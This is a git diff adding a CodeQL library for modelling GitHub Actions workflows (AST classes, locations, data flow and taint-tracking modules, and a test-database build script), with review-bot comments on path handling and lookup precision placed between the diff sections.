ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TDataFlowCallOptio-c18bdb95#1#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TLocalFlowCallCont-17f4a8f6#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TParamNodeOption-178d6b8b#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnCtx-f40235df#1# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119 create mode 100644 
ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowImplCommon#f7de413b--MakeImplCommon-DataFlowImplSpecific#51bc589c--ActionsDataFlow---Cached--TReturnKindExt-9770a119#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TDataFlowType#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TNode#0#t create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#DataFlowPrivate#6a54d7ad--TReturnKind#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-DataFlowPrivate#6a54d7ad--DataFlowType---TOption-4fb642c9#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26 create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Option#8eb11f23--Option-Unit#54592529--Unit---TOption-51176e26#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#Unit#54592529--TUnit#0# create mode 100644 ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode create mode 100644 
ql/src/test-db/db-yaml/default/cache/cached-strings/tuple-pool/tuples#printAst#38acf19d--TPrintNode#0#e create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/02.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/04.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/1f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/29.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/2e.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/32.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/46.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/4b.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/67.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/71.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/82.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/91.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/92.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/95.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/99.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/a3.pack.d create mode 100644 
ql/src/test-db/db-yaml/default/cache/pages/a4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ab.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/b6.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/bd.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/ce.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/d0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/de.pack.d create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/df.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/e6.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/pages/fc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/01.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/03.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/06.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/09.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/10.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/1f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/20.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/24.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/25.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/26.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/28.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/2e.pack create mode 100644 
ql/src/test-db/db-yaml/default/cache/predicates/2f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/32.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/36.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/3c.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/43.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/45.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/57.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/59.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/5d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/60.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/66.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6c.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/6f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/74.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/75.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/78.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/7e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/83.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/86.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/8d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/96.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/98.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/99.pack create mode 100644 
ql/src/test-db/db-yaml/default/cache/predicates/9f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a8.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/a9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bd.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/bf.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/c9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ca.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d2.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/d5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/dc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/de.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/df.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/e4.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ef.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f8.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/f9.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/predicates/ff.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/07.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/0e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/10.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/14.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/18.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/19.pack 
create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/1e.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/28.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/2f.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/39.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/47.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/4d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/52.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/56.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/59.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/5d.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/6a.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/80.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/85.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/8b.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/aa.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ac.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/c1.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/ca.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/cc.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d0.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/d5.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/relations/da.pack create mode 100644 ql/src/test-db/db-yaml/default/cache/version create mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel create mode 100644 ql/src/test-db/db-yaml/default/containerparent.rel.checksum create 
mode 100644 ql/src/test-db/db-yaml/default/files.rel create mode 100644 ql/src/test-db/db-yaml/default/files.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/folders.rel create mode 100644 ql/src/test-db/db-yaml/default/folders.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel create mode 100644 ql/src/test-db/db-yaml/default/locations_default.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/0/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/pools/0/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/ids1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/indices1/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/info create mode 100644 ql/src/test-db/db-yaml/default/pools/1/metadata/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/1/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/pools/poolInfo create mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel create mode 100644 ql/src/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/strings/0/buckets/page-000000 create mode 100644 ql/src/test-db/db-yaml/default/strings/0/metadata/page-000000 create mode 100644 
ql/src/test-db/db-yaml/default/strings/0/pageDump/page-000000000 create mode 100644 ql/src/test-db/db-yaml/default/yaml.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum create mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel create mode 100644 ql/src/test-db/db-yaml/default/yaml_scalars.rel.checksum create mode 100755 ql/src/test-db/db-yaml/yaml.dbscheme create mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091753.298Z.json create mode 100644 ql/src/test-db/diagnostic/cli-diagnostics-add-20240203T091754.191Z.json create mode 100644 ql/src/test-db/log/database-create-20240203.101751.644.log create mode 100644 ql/src/test-db/log/database-index-files-20240203.101752.962.log create mode 100644 ql/src/test-db/src.zip create mode 100644 ql/src/test/changed-files.yml create mode 100644 ql/src/test/inter1.yml create mode 100644 ql/src/test/no-flow1.yml create mode 100644 ql/src/test/no-flow2.yml create mode 100644 ql/src/test/simple1.yml create mode 100644 ql/src/test/simple2.yml create mode 100644 ql/src/test/test.ql create mode 100644 ql/src/test/test.yml
diff --git a/build-dbs.sh b/build-dbs.sh
new file mode 100755
index 000000000000..dac4753f4d61
--- /dev/null
+++ b/build-dbs.sh
@@ -0,0 +1,5 @@
+#!/bin/bash
+rm -rf ql/src/test-db || true
+rm -rf ql/lib/test-db || true
+codeql database create ql/src/test-db -l yaml -s ql/src/test
+codeql database create ql/lib/test-db -l yaml -s ql/lib/test
diff --git a/codeql-workspace.yml b/codeql-workspace.yml
new file mode 100644
index 000000000000..ad62591967d0
--- /dev/null
+++ b/codeql-workspace.yml
@@ -0,0 +1,3 @@
+provide:
+ - "**/ql/src/qlpack.yml"
+ - "**/ql/lib/qlpack.yml"
\ No newline at end of file
diff --git a/ql/lib/actions.qll b/ql/lib/actions.qll
new file mode 100644
index 000000000000..2c1d1cee9259
--- /dev/null
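Review bot: The two `rm -rf` lines at the top of build-dbs.sh resolve `ql/src/test-db` and `ql/lib/test-db` against the caller's working directory, so running the script from anywhere other than the repository root removes (or fails to find) a different path before the database build starts. Anchor the script to its own location and stop on the first failure by adding `set -euo pipefail` and `cd "$(dirname -- "$0")"` directly after the shebang. The `|| true` on both `rm -rf` lines is then redundant, since `rm -f` already exits 0 for a missing path, and as written it also masks a genuine permission error on an existing directory. Without `set -e`, a failing first `codeql database create` does not stop the second one, so the script's exit status cannot be relied on by a CI caller.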
+++ b/ql/lib/actions.qll
@@ -0,0 +1 @@
+import codeql.actions.Ast
diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml
new file mode 100644
index 000000000000..56f10b81e0c7
--- /dev/null
+++ b/ql/lib/codeql-pack.lock.yml
@@ -0,0 +1,16 @@
+---
+lockVersion: 1.0.0
+dependencies:
+ codeql/controlflow:
+ version: 0.1.7
+ codeql/dataflow:
+ version: 0.1.7
+ codeql/ssa:
+ version: 0.2.7
+ codeql/typetracking:
+ version: 0.2.7
+ codeql/util:
+ version: 0.2.7
+ codeql/yaml:
+ version: 0.2.7
+compiled: false
diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll
new file mode 100644
index 000000000000..3a16bdec40d2
--- /dev/null
+++ b/ql/lib/codeql/Locations.qll
@@ -0,0 +1,71 @@ +/** Provides classes for working with locations. */ + +import files.FileSystem + +bindingset[loc] +pragma[inline_late] +private string locationToString(Location loc) { + exists(string filepath, int startline, int startcolumn, int endline, int endcolumn | + loc.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) and + result = filepath + "@" + startline + ":" + startcolumn + ":" + endline + ":" + endcolumn + ) +} + +/** + * A location as given by a file, a start line, a start column, + * an end line, and an end column. + * + * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +class Location extends @location_default { + /** Gets the file for this location. */ + File getFile() { locations_default(this, result, _, _, _, _) } + + /** Gets the 1-based line number (inclusive) where this location starts. */ + int getStartLine() { locations_default(this, _, result, _, _, _) } + + /** Gets the 1-based column number (inclusive) where this location starts. */ + int getStartColumn() { locations_default(this, _, _, result, _, _) } + + /** Gets the 1-based line number (inclusive) where this location ends. */ + int getEndLine() { locations_default(this, _, _, _, result, _) } + + /** Gets the 1-based column number (inclusive) where this location ends. */ + int getEndColumn() { locations_default(this, _, _, _, _, result) } + + /** Gets the number of lines covered by this location. */ + int getNumLines() { result = this.getEndLine() - this.getStartLine() + 1 } + + /** Gets a textual representation of this element. */ + pragma[inline] + string toString() { result = locationToString(this) } + + /** + * Holds if this element is at the specified location. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `filepath`. 
+ * For more information, see + * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ + predicate hasLocationInfo( + string filepath, int startline, int startcolumn, int endline, int endcolumn + ) { + exists(File f | + locations_default(this, f, startline, startcolumn, endline, endcolumn) and + filepath = f.getAbsolutePath() + ) + } + + /** Holds if this location starts strictly before the specified location. */ + pragma[inline] + predicate strictlyBefore(Location other) { + this.getStartLine() < other.getStartLine() + or + this.getStartLine() = other.getStartLine() and this.getStartColumn() < other.getStartColumn() + } +} + +/** An entity representing an empty location. */ +class EmptyLocation extends Location { + EmptyLocation() { this.hasLocationInfo("", 0, 0, 0, 0) } +} diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll new file mode 100644 index 000000000000..967a969a6b72 --- /dev/null +++ b/ql/lib/codeql/actions/Ast.qll 
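Review bot: `strictlyBefore` orders two locations by start line and start column only and never compares their files, so a location on line 3 of one workflow file counts as strictly before a location on line 5 of a different file. Because this library models many workflow files per database, either the doc comment should state the limitation, e.g. `/** Holds if this location starts strictly before the specified location. Only meaningful when both locations are in the same file; files are not compared. */`, or the predicate should add `this.getFile() = other.getFile()` as a first conjunct.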
@@ -0,0 +1,256 @@ +private import codeql.actions.ast.internal.Actions +private import codeql.Locations + +class AstNode instanceof YamlNode { + AstNode getParentNode() { + if exists(YamlMapping m | m.maps(_, this)) + then exists(YamlMapping m | m.maps(result, this)) + else result = super.getParentNode() + } + + AstNode getAChildNode() { + if this instanceof YamlMapping + then this.(YamlMapping).maps(result, _) + else + if this instanceof YamlCollection + then result = super.getChildNode(_) + else + if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) + then exists(YamlMapping m | m.maps(this, result)) + else none() + } + + AstNode getChildNodeByOrder(int i) { + result = + rank[i](Expression child, Location l | + child = this.getAChildNode() and + child.getLocation() = l + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } + + string toString() { result = super.toString() } + + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } + + Location getLocation() { result = super.getLocation() } +} + +class Statement extends AstNode { + // narrow down to something that is a statement + // A statement is a group of expressions and/or statements that you design to carry out a task or an action. + // Any statement that can return a value is automatically qualified to be used as an expression. +} + +class Expression extends Statement { + // narrow down to something that is an expression + // An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. +} + +/** + * A Job is a collection of steps that run in an execution environment. + */ +class JobStmt extends Statement instanceof Actions::Job { + /** + * Gets the ID of this job, as a string. + * This is the job's key within the `jobs` mapping. 
+ */ + string getId() { result = super.getId() } + + /** Gets the human-readable name of this job, if any, as a string. */ + string getName() { + result = super.getId() + or + not exists(string s | s = super.getId()) and result = "unknown" + } + + /** Gets the step at the given index within this job. */ + StepStmt getStep(int index) { result = super.getStep(index) } + + /** Gets any steps that are defined within this job. */ + StepStmt getAStep() { result = super.getStep(_) } + + JobStmt getNeededJob() { + exists(Actions::Needs needs | + needs.getJob() = this and + result = needs.getANeededJob().(JobStmt) + ) + } + + Expression getJobOutputExpr(string varName) { + this.(Actions::Job) + .lookup("outputs") + .(YamlMapping) + .maps(any(YamlScalar a | a.getValue() = varName), result) + } + + JobOutputStmt getJobOutputStmt() { result = this.(Actions::Job).lookup("outputs") } + + Statement getSuccNode(int i) { + result = + rank[i](Expression child, Location l | + (child = this.getAStep() or child = this.getJobOutputStmt()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +class JobOutputStmt extends Statement instanceof YamlMapping { + JobStmt job; + + JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } + + StepOutputAccessExpr getSuccNode(int i) { result = this.(YamlMapping).getValueNode(i) } +} + +/** + * A Step is a single task that can be executed as part of a job. + */ +class StepStmt extends Statement instanceof Actions::Step { + string getId() { result = super.getId() } + + string getName() { + result = super.getId() + or + not exists(string s | s = super.getId()) and result = "unknown" + } + + JobStmt getJob() { result = super.getJob() } + + abstract AstNode getSuccNode(int i); +} + +/** + * A Uses step represents a call to an action that is defined in a GitHub repository. 
+ */ +class UsesExpr extends StepStmt, Expression { + Actions::Uses uses; + + UsesExpr() { uses.getStep() = this } + + string getTarget() { result = uses.getGitHubRepository() } + + string getVersion() { result = uses.getVersion() } + + Expression getArgument(string key) { + exists(Actions::With with | + with.getStep() = this and + result = with.lookup(key) + ) + } + + Expression getArgumentByOrder(int i) { + exists(Actions::With with | + with.getStep() = uses.getStep() and + result = + rank[i](Expression child, Location l | + child = with.lookup(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + ) + } + + Expression getAnArgument() { + exists(Actions::With with | + with.getStep() = this and + result = with.lookup(_) + ) + } + + override AstNode getSuccNode(int i) { result = this.getArgumentByOrder(i) } +} + +/** + * An argument passed to a UsesExpr. + */ +class ArgumentExpr extends Expression { + UsesExpr uses; + + ArgumentExpr() { this = uses.getAnArgument() } +} + +/** + * A Run step represents a call to an inline script or executable on the runner machine. + */ +class RunExpr extends StepStmt { + Actions::Run scriptExpr; + + RunExpr() { scriptExpr.getStep() = this } + + Expression getScriptExpr() { result = scriptExpr } + + string getScript() { result = scriptExpr.getValue() } + + override AstNode getSuccNode(int i) { result = this.getScriptExpr() and i = 0 } +} + +/** + * A YAML string containing a workflow expression. + */ +class ExprAccessExpr extends Expression instanceof YamlString { + string expr; + + ExprAccessExpr() { expr = Actions::getASimpleReferenceExpression(this) } + + string getExpression() { result = expr } + + JobStmt getJob() { result.getAChildNode*() = this } +} + +/** + * A ExprAccessExpr where the expression references a step output. 
+ * eg: `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepOutputAccessExpr extends ExprAccessExpr { + string stepId; + string varName; + + StepOutputAccessExpr() { + stepId = + this.getExpression().regexpCapture("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + varName = + this.getExpression().regexpCapture("steps\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getStepId() { result = stepId } + + string getVarName() { result = varName } + + StepStmt getStep() { result.getId() = stepId } +} + +/** + * A ExprAccessExpr where the expression references a job output. + * eg: `${{ needs.job1.outputs.foo}}` + */ +class JobOutputAccessExpr extends ExprAccessExpr { + string jobId; + string varName; + + JobOutputAccessExpr() { + jobId = + this.getExpression().regexpCapture("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + varName = + this.getExpression().regexpCapture("needs\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getVarName() { result = varName } + + Expression getOutputExpr() { + exists(JobStmt job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getJobOutputExpr(varName) = result + ) + } +} diff --git a/ql/lib/codeql/actions/Cfg.qll b/ql/lib/codeql/actions/Cfg.qll new file mode 100644 index 000000000000..df7acf4e1c05 --- /dev/null +++ b/ql/lib/codeql/actions/Cfg.qll @@ -0,0 +1,7 @@ +/** Provides classes representing the control flow graph. */ + +private import codeql.actions.controlflow.internal.Cfg as CfgInternal +import CfgInternal::Completion +import CfgInternal::CfgScope +import CfgInternal::CfgImpl + diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll new file mode 100644 index 000000000000..d1e714e8fbc0 --- /dev/null +++ b/ql/lib/codeql/actions/DataFlow.qll 
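Review bot: `StepOutputAccessExpr.getStep()` resolves `steps.<id>.outputs.<var>` by step id alone (`result.getId() = stepId`), so a step with the same `id` in another job of the same workflow, or in any other workflow file in the database, also matches and will yield cross-job and cross-file flow that cannot occur at runtime. `JobOutputAccessExpr.getOutputExpr()` already restricts its lookup to the same file; the step variant should at least do the same, and preferably require the enclosing job: `StepStmt getStep() { result.getId() = stepId and result.getJob() = this.getJob() }`. Separately, `JobStmt.getName()` is documented as returning the human-readable name but returns `super.getId()`, and since `Actions::Job` always has a job id the `"unknown"` branch is unreachable; `StepStmt.getName()` makes the same id-for-name substitution. Finally, `rank[i]` in `getChildNodeByOrder` and `JobStmt.getSuccNode` is 1-based in QL while `RunExpr.getSuccNode` returns its only child at `i = 0`, so the index base of `getSuccNode` differs between subclasses and should be documented on the abstract declaration in `StepStmt`.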
@@ -0,0 +1,10 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) data flow analyses. + */ +module DataFlow { + private import codeql.dataflow.DataFlow + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + import DataFlowMake + import codeql.actions.dataflow.internal.DataFlowPublic +} diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll new file mode 100644 index 000000000000..16d5d826aa88 --- /dev/null +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -0,0 +1,10 @@ +/** + * Provides classes for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ +module TaintTracking { + private import codeql.actions.dataflow.internal.DataFlowImplSpecific + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + private import codeql.dataflow.TaintTracking + import TaintFlowMake +} diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll new file mode 100644 index 000000000000..e3be61fd3b99 --- /dev/null +++ 